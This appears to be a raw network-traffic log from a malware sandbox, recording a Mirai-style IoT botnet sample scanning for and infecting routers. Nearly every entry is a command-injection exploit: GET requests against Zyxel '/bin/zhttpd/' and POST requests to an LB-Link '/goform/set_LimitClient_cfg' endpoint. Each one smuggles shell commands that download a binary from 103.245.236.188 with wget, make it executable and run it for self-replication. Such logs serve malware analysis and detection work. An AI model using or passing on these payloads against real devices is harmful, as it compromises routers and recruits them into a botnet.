                                                Jan 12, 2024 18:16:19.364119053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3631192.168.2.233552871.84.152.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364137888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3632192.168.2.234903881.42.225.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364172935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3633192.168.2.2357762201.136.232.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364216089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3634192.168.2.2334396130.254.70.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364253044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3635192.168.2.234111283.229.127.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364284039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3636192.168.2.2333674120.98.205.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364300013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3637192.168.2.2336124153.31.81.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364367008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3638192.168.2.2337628201.141.130.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364408970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3639192.168.2.235512635.106.228.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364448071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3640192.168.2.2349930142.130.61.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.364499092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3641192.168.2.2335206187.57.255.388080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.622876883 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:16:19.849875927 CET525INHTTP/1.1 400 Bad Request
                                                Content-Type: text/html; charset=us-ascii
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Fri, 12 Jan 2024 17:15:25 GMT
                                                Connection: close
                                                Content-Length: 334
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3642192.168.2.2359178118.63.199.1328080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.138256073 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:16:20.436209917 CET103INHTTP/1.1 404 Not Found
                                                Content-Type: text/plain
                                                Content-Length: 30
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3643192.168.2.2354958217.108.240.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384502888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3644192.168.2.236015485.242.184.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384550095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3645192.168.2.2360118153.189.187.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384592056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3646192.168.2.2335196139.86.60.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384649038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3647192.168.2.235972671.2.131.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384675980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3648192.168.2.235926889.231.79.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384721041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3649192.168.2.2354902131.35.251.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384763002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3650192.168.2.236094041.122.78.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384809971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3651192.168.2.235251081.143.220.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384852886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3652192.168.2.234736648.214.2.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384901047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3653192.168.2.2341876105.154.215.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384931087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3654192.168.2.234639647.48.104.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384982109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3655192.168.2.233825661.161.12.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.384996891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3656192.168.2.2360450132.223.118.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385059118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3657192.168.2.2334308146.31.51.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385083914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3658192.168.2.2357056159.123.237.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385123014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3659192.168.2.2350022210.1.126.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385211945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3660192.168.2.2353554135.153.253.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385211945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3661192.168.2.2360996152.66.30.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385240078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3662192.168.2.2336506119.68.182.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385283947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3663192.168.2.234817052.192.233.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385334015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3664192.168.2.2344474163.198.244.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385374069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3665192.168.2.234206490.37.177.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385416985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3666192.168.2.2352000135.99.21.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385462046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3667192.168.2.2353346188.225.162.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385504007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3668192.168.2.2350672190.82.146.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385548115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3669192.168.2.2337098203.136.244.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385591984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3670192.168.2.2340366172.3.18.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385658979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3671192.168.2.235085450.96.248.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385700941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3672192.168.2.2355996151.70.118.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385729074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3673192.168.2.2352316209.219.187.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385760069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3674192.168.2.234317020.58.116.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385771990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3675192.168.2.234511280.72.148.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385804892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3676192.168.2.233656443.235.91.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385864019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3677192.168.2.2342000103.109.50.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385896921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3678192.168.2.2347836182.178.29.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385929108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3679192.168.2.233947847.208.77.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.385970116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3680192.168.2.235000282.201.47.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386009932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3681192.168.2.2343290170.193.160.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386040926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3682192.168.2.234219870.137.139.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386106014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3683192.168.2.23342889.186.176.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386148930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3684192.168.2.2342470132.141.13.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386173010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


